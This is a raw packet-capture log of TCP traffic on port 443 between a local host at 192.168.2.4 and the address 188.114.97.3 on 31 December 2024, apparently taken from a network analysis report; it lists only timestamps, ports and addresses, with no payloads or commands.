                                                                                              Dec 31, 2024 08:57:15.296175957 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.296231985 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.296231985 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.296237946 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.298119068 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.298134089 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.298166037 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.298168898 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.298194885 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.332618952 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.332633972 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.332699060 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.332704067 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.348330975 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.348350048 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.348376036 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.348382950 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.348436117 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.350244999 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.350264072 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.350291014 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.350296974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.350339890 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.352025032 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.352045059 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.352128029 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.352133989 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.352159023 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.370464087 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.370490074 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.370526075 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.370536089 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.370570898 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.382503033 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.382524014 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.382592916 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.382592916 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.382597923 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.383141994 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.383152962 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.383213997 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.383219957 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.384841919 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.384859085 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.384886980 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.384896994 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.384922028 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.419526100 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.419538975 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.419589043 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.419598103 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.419636011 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.435134888 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.435152054 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.435200930 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.435210943 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.435240984 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.436994076 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.437006950 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.437038898 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.437045097 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.437073946 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.438772917 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.438792944 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.438852072 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.438855886 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.438875914 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.457437038 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.457451105 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.457525969 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.457531929 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.469502926 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.469508886 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.469580889 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.469587088 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.470016956 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.470033884 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.470088005 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.470092058 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.471551895 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.471569061 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.471671104 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.471677065 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.506392002 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.506406069 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.506484985 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.506484985 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.506491899 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.521985054 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.522001982 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.522036076 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.522041082 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.522115946 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.523658037 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.523670912 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.523726940 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.523735046 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.523750067 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.525541067 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.525561094 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.525618076 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.525624037 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.525640011 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.544275045 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.544289112 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.544367075 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.544373035 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.544393063 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.556370974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.556389093 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.556438923 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.556443930 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.556466103 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.556849957 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.556862116 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.556911945 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.556915998 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.556930065 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.559439898 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.559458017 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.559479952 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.559484959 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.559515953 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.593177080 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.593190908 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.593242884 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.593249083 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.593269110 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.608688116 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.608706951 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.608740091 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.608747005 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.608791113 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.610522985 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.610536098 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.610579014 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.610586882 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.610599995 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.612369061 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.612392902 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.612452030 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.612457037 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.612488031 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.631109953 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.631124973 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.631226063 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.631231070 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.643100977 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.643119097 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.643150091 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.643156052 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.643191099 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.643599033 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.643613100 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.643699884 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.643706083 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.646260023 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.646275997 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.646317005 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.646323919 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.646341085 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.679974079 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.680001974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.680032015 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.680038929 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.680082083 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.695611954 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.695635080 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.695719957 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.695728064 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.697268963 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.697283030 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.697313070 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.697326899 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.697352886 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.699042082 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.699059010 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.699119091 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.699125051 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.699140072 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.717933893 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.717947006 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.717992067 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.717998028 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.718023062 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.729877949 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.729896069 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.729922056 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.729928970 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.729988098 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.730453014 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.730479002 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.730518103 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.730525970 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.730537891 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.733242989 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.733262062 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.733428955 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.733434916 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.766798973 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.766813993 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.766865015 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.766876936 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.766899109 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.782386065 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.782403946 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.782450914 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.782458067 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.784034967 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.784046888 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.784138918 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.784145117 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.785799026 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.785815001 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.785844088 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.785850048 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.785873890 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.804656982 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.804668903 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.804713964 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.804724932 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.804780960 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.816812038 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.816832066 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.816883087 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.816891909 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.816914082 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.817257881 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.817271948 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.817331076 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.817339897 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.819966078 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.819984913 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.820034027 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.820039988 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.820074081 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.853600979 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.853615046 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.853696108 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.853702068 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.869112015 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.869129896 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.869167089 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.869175911 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.869219065 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.870804071 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.870817900 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.870851994 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.870857954 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.870886087 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.872637987 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.872662067 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.872703075 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.872708082 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.872773886 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.891525030 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.891544104 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.891582012 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.891587973 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.891613960 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.903585911 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.903600931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.903636932 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.903642893 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.903667927 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.904146910 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.904164076 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.904186964 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.904192924 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.904234886 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.906706095 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.906719923 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.906835079 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.906835079 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.906841040 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.940561056 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.940582037 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.940637112 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.940645933 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.940674067 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.955923080 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.955938101 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.955987930 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.955993891 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.956002951 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.957603931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.957626104 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.957664967 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.957669020 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.957691908 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.959372044 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.959383965 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.959443092 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.959448099 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.978360891 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.978378057 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.978430986 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.978436947 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.978451014 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.990449905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.990463972 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.990525961 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.990531921 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.991017103 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.991034031 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.991061926 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.991070986 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.991101027 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.993607044 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.993622065 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.993659973 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:15.993664980 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:15.993690014 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.034442902 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.034461975 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.034523964 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.034531116 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.034554958 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.042710066 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.042723894 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.042777061 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.042782068 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.044442892 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.044477940 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.044507027 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.044514894 CET44349735188.114.97.3192.168.2.4
